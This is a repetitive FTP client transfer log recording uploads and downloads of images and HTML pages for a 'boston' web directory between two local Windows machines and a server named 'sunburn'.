10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
